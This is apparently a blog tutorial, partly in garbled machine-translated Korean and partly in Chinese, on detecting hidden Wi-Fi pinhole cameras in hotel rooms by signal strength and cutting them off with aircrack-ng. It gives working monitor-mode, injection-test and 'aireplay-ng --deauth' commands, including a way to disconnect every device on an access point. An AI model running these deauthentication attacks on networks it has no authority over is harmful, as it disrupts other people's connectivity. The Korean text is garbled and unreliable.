무선 신호 특성을 이용하여, 카메라에 특급 호텔을 종료 할 수있는 방법 찾기 (무선 보안을? 그건 안전 개방되지 않습니다)

    우리는 문제 익스프레스 호텔 숙박을 가진 대해 나쁜 생각이나 걱정 발생하지 않은? 사진 핀홀 카메라 오퍼레이터가된다는 것은 나쁜 일이 마음?이 종이 선물이 상황에 대처하는 방법이 아니다.

    화면이 촬영 후 핀홀 카메라를 설치 네트워크로 전송 될 수밖에 없다. 핀홀 카메라를 숨겨 때문에, 카메라가 유선 네트워크를 사용하지 않는 나머지 옵션은 무선 네트워크입니다. 무선 네트워크에 대한 두 가지 옵션이 있습니다 : 4 세대 네트워크 전송을 통해 삽입 된 SIM 카드, WIFI 인 제공하여 b를 ... B는 입력 옵션 옵션 (A)보다 작고, 통합의 용이성, 추가 SIM 카드는 실제 이름, 핀홀 카메라는 자주 사용되는 옵션 B를 추적되어있을 수 있습니다. 이 토론은 카메라 2.4G WIFI 환경 방법뿐만 아니라, 적절한 방법 볼 것이다 그래서. 상기 목적을 달성하기 위해, 칼리 리눅스 Aircrack-NG 키트를 사용할 필요는 모니터 모드 무선 카드로 전환 할 필요가있다. 고온 장치, 일반적으로 무선 라우터를 제공 AP- 수단; 역 -가 AP에 의해 제공되는 랩탑, 모바일 폰, essid- 핑거와 AP에 연결된 장치를 의미한다 : 시작하기 전에, 먼저 설명한 여러 용어가 사용될 포인트 이름, 액세스 포인트 이름 목록이 ESSID되는 창-Fi 인터넷을 클릭합니다.

주제 1 : 방 카메라 찾기

소개 1 :

너무 많은 ESSID 윈도우 네트워크 연결 목록에서 와서?

AP는 주기적으로 패킷 비콘 패킷을 전송하고, 통신 채널은, 네트워크를 문질러 수 AP 내에 역 검출 범위 주위 말하고 ESSID. 예컨대 BSSID, 채널 등 : 네트워크 연결이 ESSID리스트에서 선택 될 수 있고, 각각의 ESSID의 특성을 나열하는 특성을 클릭. 또한이 검색 도구 AP 1) InSsider에서 .Windows ---- 메가 Geeker 제품 소개, LinSsider 아래 2) .Linux를, 오픈 소스 프로젝트, 그들은 더 친숙한 그래픽 인터페이스를 제공합니다. 이러한 도구, 초점 및 기록 BSSID의 주변에 수집 된 AP 정보를 자신의 긍정적 인 연결을 ESSID.

텍스트 1 :

사실, 방 평가에서 무선 장치의 수는, 방 카메라를 찾습니다. Aircrack-ng를 airodump-ng를 도구 스위트는 일반적으로, 더 많은 감쇠의 손에 무선 카드에 그들에게 신호 감쇠 역의 정도를 제공하면서, 먼 거리, 특정 스테이션을 ESSID 검색 및 목록에 연결할 수 있습니다 . 802.11 기준에 주어 내 시험 결과 : 두 개의 디바이스는 서로 가까이, 신호 감쇠 -10mdb, -30mdb-60mdb 신호 사이의 일반적인 실내 감쇠가 벽 이격 장비 -70 감쇠 때 -80mdb. 신호 감쇠의 정도는이 우리가 실내 무선 장치의 수를 찾는 데 도움이됩니다합니다. 낯선 사람이 방에 들어갔을 때, 우리는 무선 네트워크 장치를 볼 수있는, 상상하는 것은 -70mdb 내에 결론을 내릴 수있다 방 1 TV 방송국에 지나지 목록 주어진다면 더 조금 놀라운 것보다 역 번호, 방에 신호 감쇠 역의 정도입니다 전투. 방 관찰 된 신호 감쇠의 변화의 정도를 걷고, 가까이 핀홀 카메라들 중 하나에 위치 될 수 저자.

>airodump-ng --bssid 50:fa:84:16:46:ea --essid WirelessLab –c 1 –a
#-c是指AP使用的信道从前面LinSsid获得
#--bssid,--essid的参数 50:fa:84:16:46:ea和WirelessLab从前面LinSsid获得

도 출력 PWR 상기 열 방 역에서 신호 감쇠의 정도 다른 airodump-ng에 기계 실행되는 airodump-ng에

주제 2 : 카메라를 분리 링크

소개 2 :

TCP는 (어떻게 연결을 설정?) 3 방향 핸드 셰이크를 통해 연결을 설정하려면. 인증 - - 상관 - 네 단계를 연결하는 스캔하십시오 AP와 역 WIFI 연결은 유사한 절차를 설정합니다. AP 스테이션과 연결이, 당신은 비인증 스테이션 패키지는 인증 해제를 할 수 있습니다 보낼 수 있습니다. 비인증이 비인증 프레임에 대해, IEEE 802.11 프로토콜을 받고있다. 다음과 같은 특성을 갖는 2) 쉽게 위조 된 소스 MAC 주소 3) 힘 라인을 데려 갈 수있는 고객 한 것은) 전송 사람이 암호화되지 않습니다.

Tex2 :

前面的步骤即使我们找到了所有的摄像头,也不代表我们可以把这些摄像头全部取下来并关闭。比如,有些摄像头藏在墙上插座后面,我总不至于出差在外还带着螺丝刀把面板卸下来。万一触电怎么办?就算没触电,破坏酒店设置又怎么办?面对这些摄像头,我们就真的无计可施了?倒也不是,可以让摄像头断网,那视频就无法上传了。这就用到aircrack-ng套件中的另一个工具aireply-ng,它可以向AP/Station发送包含特定数据的包,比如Deauthentication包,让特定的station下线.

实施前首先要测试AP是否可以注入

root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道
root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea  wlan1mon
02:30:50  Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50  Trying broadcast probe requests...
02:30:50  Injection is working! #有这段话,可以认为可以实施注入
02:30:52  Found 1 AP 

02:30:52  Trying directed probe requests...
02:30:52  50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52  Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52  30/30: 100% #

确定AP可以注入后,即可实施断网

root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
-c指定一个Station,不加 -c选项则将AP下所有的Station全踢下线

Summary:

我们的网卡一般工作在Managed模式下,只能接受发送AP发送给它的帧。Station收到这些帧后,会把802.11头部剥去,替换为Ethnet头部然后发送给网络协议栈。这样做的好处是对上层应用屏蔽其底层传输介质,坏处就是无法分析802.11协议头部。如果想接受到周围的所有数据帧,以及完成上述实验,需要将网卡切换到Monitor模式。当然不是所有的网卡支持Monitor模式。Windows下只能选Mega Geek的Airpcap网卡,就是贵了点:支持802.11 b/g/n协议的大概要2K左右;支持a/b/g/n协议的在5K左右。所以一般会在Linux下完成上述任务。另外,如果网卡只支持802.11 b/g/n协议,那么它将接受不到5GHz的AP信号。当然了现在很多无线设备和无线路由只支持b/g/n协议。

查看网卡支持的工作模式以及支持的802.11协议:

# iw list
Supported interface modes:
#支持的工作模式
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
…
Frequencies:
#支持的频段
			* 2412 MHz [1] (20.0 dBm)
			* 2417 MHz [2] (20.0 dBm)

 

发布了233 篇原创文章 · 获赞 106 · 访问量 56万+

추천

출처blog.csdn.net/lixiangminghate/article/details/103539267